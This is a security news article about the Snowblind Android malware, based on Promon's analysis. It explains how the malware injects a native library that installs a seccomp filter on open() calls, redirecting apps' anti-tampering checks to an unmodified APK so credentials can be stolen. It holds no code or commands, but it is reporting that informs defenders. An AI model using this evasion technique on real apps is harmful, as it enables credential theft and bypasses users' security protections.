A novel Android attack vector from a piece of malware tracked as Snowblind is abusing a security feature to bypass existing anti-tampering protections in apps that handle sensitive user data.
Snowblind's goal is to repackage a target app to make them unable to detect abuse of accessibility services that allow it to obtain user input such as credentials, or to get remote control access to run malicious actions.
Unlike other Android malware Snowblind abuses 'seccomp', short for secure computing, a Linux kernel feature that Android uses for integrity checks on applications, to protect users against malicious actions such as application repackaging.
Mobile app security company Promon was able to analyze how Snowblind achieves its goal undetected after receiving a sample from i-Sprint, a partner providing access and identity system protections to businesses.
Seccomp is a Linux kernel security feature designed to reduce the attack surface of applications by restricting the system calls they can make.
It acts as a filter for the syscalls an app is allowed to run, blocking those that have been abused in attacks.
Google first integrated seccomp in Android 8, implementing it in the Zygote process, which is the parent process of all Android apps.
Snowblind targets apps that handle sensitive data by injecting a native library which loads before the anti-tampering code, and installs a seccomp filter to intercepts system calls such as the 'open() syscall,' commonly used in file access.
When the APK of the target app is checked for tampering, Snowblind's seccomp filter does not allow the call to proceed and instead triggers a SIGSYS signal indicating that the process sent a bad argument to the system call.
This way, the malware can modify the 'open()' system call arguments to point the anti-tampering code to an unmodified version of the APK. Due to the targeted nature of the seccomp filter, the performance impact and operational footprint are minimal, so the user is unlikely to notice anything during normal app operations.
In a video demonstrating how the attack works, the researchers show that a Snowblind attack is completely invisible to the user and can result in leaking login credentials.
The researchers told BleepingComputer that Snowblind can be used to disable various security features in apps, such as two-factor authentication, or biometric verification.
Promon says that Snowblind was observed targeting one app of an i-Sprint customer in Southeast Asia.
It is unclear how many apps have been targeted so far.
The method could be adopted by other adversaries to bypass protections in Android.
Based on our current detection, no apps containing this malware are found on Google Play.Android users are automatically protected against known versions of this malware by Google Play Protect, which is on by default on Android devices with Google Play Services.
New Medusa malware variants target Android users in seven countries.
Over 90 malicious Android apps with 5.5M installs found on Google Play.
Finland warns of Android malware attacks breaching bank accounts.
New Wpeeper Android malware hides behind hacked WordPress sites.
This Cyber News was published on www.bleepingcomputer.com. Publication date: Wed, 26 Jun 2024 19:10:19 +0000